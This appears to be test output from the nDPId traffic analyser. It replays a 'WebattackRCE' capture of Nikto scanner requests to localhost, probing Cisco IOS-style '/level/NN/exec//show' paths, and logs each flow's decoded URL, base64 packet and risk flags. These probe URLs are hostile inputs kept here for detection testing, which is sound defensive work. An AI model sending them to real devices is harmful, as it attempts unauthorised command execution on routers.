-00698{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":562,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":562,"flow_packet_id":1,"flow_last_seen":1576420277577,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":231,"pkt_l4_len":197,"thread_ts_msec":1576420277577,"pkt":"AAAAAAAAAAAAAAAACABFAADZSeNAAEAG8jl\/AAABfwAAAcX+H5DfuHEUhorfS4AYAED+zQAAAQEICp1m\/nGdZv5xR0VUIC9sZXZlbC8xNi9sZXZlbC8xNi9leGVjLy9zaG93L3ZlcnNpb24gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNjEpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01089{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":562,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":562,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277577,"flow_last_seen":1576420277577,"flow_idle_time":7440000,"flow_min_l4_payload_len":165,"flow_max_l4_payload_len":165,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":165,"midstream":1,"thread_ts_msec":1576420277577,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50686,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/level\/16\/exec\/\/show\/version","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001261)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":563,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":563,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277578,"flow_last_seen":1576420277578,"flow_idle_time":7440000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":195,"midstream":1,"thread_ts_msec":1576420277578,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50688,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00738{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":563,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":563,"flow_packet_id":1,"flow_last_seen":1576420277578,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":261,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":261,"pkt_l4_len":227,"thread_ts_msec":1576420277578,"pkt":"AAAAAAAAAAAAAAAACABFAAD3GI1AAEAGI3J\/AAABfwAAAcYAH5BPCyB6v01M8IAYAED+6wAAAQEICp1m\/nKdZv5yR0VUIC9sZXZlbC8xNi9sZXZlbC8xNi9leGVjLy9zaG93L3J1bm5pbmctY29uZmlnL2ludGVyZmFjZS9GYXN0RXRoZXJuZXQgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTI2MikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01121{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":563,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":563,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277578,"flow_last_seen":1576420277578,"flow_idle_time":7440000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":195,"midstream":1,"thread_ts_msec":1576420277578,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50688,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/level\/16\/exec\/\/show\/running-config\/interface\/FastEthernet","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001262)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":564,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":564,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277580,"flow_last_seen":1576420277580,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277580,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50690,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":564,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":564,"flow_packet_id":1,"flow_last_seen":1576420277580,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277580,"pkt":"AAAAAAAAAAAAAAAACABFAADIjaNAAEAGrop\/AAABfwAAAcYCH5DxgrVTaB5HZIAYAED+vAAAAQEICp1m\/nSdZv50R0VUIC9sZXZlbC8xNi9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNjMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":564,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":564,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277580,"flow_last_seen":1576420277580,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277580,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50690,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/16\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001263)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":565,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":565,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277581,"flow_last_seen":1576420277581,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277581,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50692,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":565,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":565,"flow_packet_id":1,"flow_last_seen":1576420277581,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277581,"pkt":"AAAAAAAAAAAAAAAACABFAADI2jFAAEAGYfx\/AAABfwAAAcYEH5BCjuLdnOtotYAYAED+vAAAAQEICp1m\/nWdZv51R0VUIC9sZXZlbC8xNy9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNjQpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":565,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":565,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277581,"flow_last_seen":1576420277581,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277581,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50692,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/17\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001264)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":566,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":566,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277583,"flow_last_seen":1576420277583,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277583,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50694,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":566,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":566,"flow_packet_id":1,"flow_last_seen":1576420277583,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277583,"pkt":"AAAAAAAAAAAAAAAACABFAADIW7pAAEAG4HN\/AAABfwAAAcYGH5CxzGNMmxSh6IAYAED+vAAAAQEICp1m\/nedZv53R0VUIC9sZXZlbC8xOC9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjY1KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":566,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":566,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277583,"flow_last_seen":1576420277583,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277583,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50694,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/18\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001265)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":567,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":567,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277584,"flow_last_seen":1576420277584,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277584,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50696,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":567,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":567,"flow_packet_id":1,"flow_last_seen":1576420277584,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277584,"pkt":"AAAAAAAAAAAAAAAACABFAADIKRRAAEAGExp\/AAABfwAAAcYIH5CpMBHnxNoUUoAYAED+vAAAAQEICp1m\/nidZv54R0VUIC9sZXZlbC8xOS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNjYpDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":567,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":567,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277584,"flow_last_seen":1576420277584,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277584,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50696,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/19\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001266)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":568,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":568,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277586,"flow_last_seen":1576420277586,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277586,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50698,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":568,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":568,"flow_packet_id":1,"flow_last_seen":1576420277586,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277586,"pkt":"AAAAAAAAAAAAAAAACABFAADIukpAAEAGgeN\/AAABfwAAAcYKH5AiT4K97CCbIYAYAED+vAAAAQEICp1m\/nqdZv56R0VUIC9sZXZlbC8yMC9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjY3KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":568,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":568,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277586,"flow_last_seen":1576420277586,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277586,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50698,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/20\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001267)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":569,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":569,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277588,"flow_last_seen":1576420277588,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277588,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50700,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":569,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":569,"flow_packet_id":1,"flow_last_seen":1576420277588,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277588,"pkt":"AAAAAAAAAAAAAAAACABFAADIUb5AAEAG6m9\/AAABfwAAAcYMH5BdL2lKom\/agYAYAED+vAAAAQEICp1m\/nydZv58R0VUIC9sZXZlbC8yMS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNjgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":569,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":569,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277588,"flow_last_seen":1576420277588,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277588,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50700,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/21\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001268)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":570,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":570,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277590,"flow_last_seen":1576420277590,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277590,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50702,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":570,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":570,"flow_packet_id":1,"flow_last_seen":1576420277590,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277590,"pkt":"AAAAAAAAAAAAAAAACABFAADIMkhAAEAGCeZ\/AAABfwAAAcYOH5Ck4gq0tTkM3YAYAED+vAAAAQEICp1m\/n6dZv5+R0VUIC9sZXZlbC8yMi9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNjkpDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":570,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":570,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277590,"flow_last_seen":1576420277590,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277590,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50702,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/22\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001269)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":571,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":571,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277592,"flow_last_seen":1576420277592,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277592,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50704,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":571,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":571,"flow_packet_id":1,"flow_last_seen":1576420277592,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277592,"pkt":"AAAAAAAAAAAAAAAACABFAADIGgdAAEAGIid\/AAABfwAAAcYQH5AVMSL0hIVMXoAYAED+vAAAAQEICp1m\/oCdZv5\/R0VUIC9sZXZlbC8yMy9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjcwKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":571,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":571,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277592,"flow_last_seen":1576420277592,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277592,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50704,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/23\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001270)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":572,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":572,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277593,"flow_last_seen":1576420277593,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277593,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50706,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":572,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":572,"flow_packet_id":1,"flow_last_seen":1576420277593,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277593,"pkt":"AAAAAAAAAAAAAAAACABFAADI3vBAAEAGXT1\/AAABfwAAAcYSH5AD6eYZLZCITIAYAED+vAAAAQEICp1m\/oGdZv6BR0VUIC9sZXZlbC8yNC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNzEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":572,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":572,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277593,"flow_last_seen":1576420277593,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277593,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50706,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/24\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001271)"}} 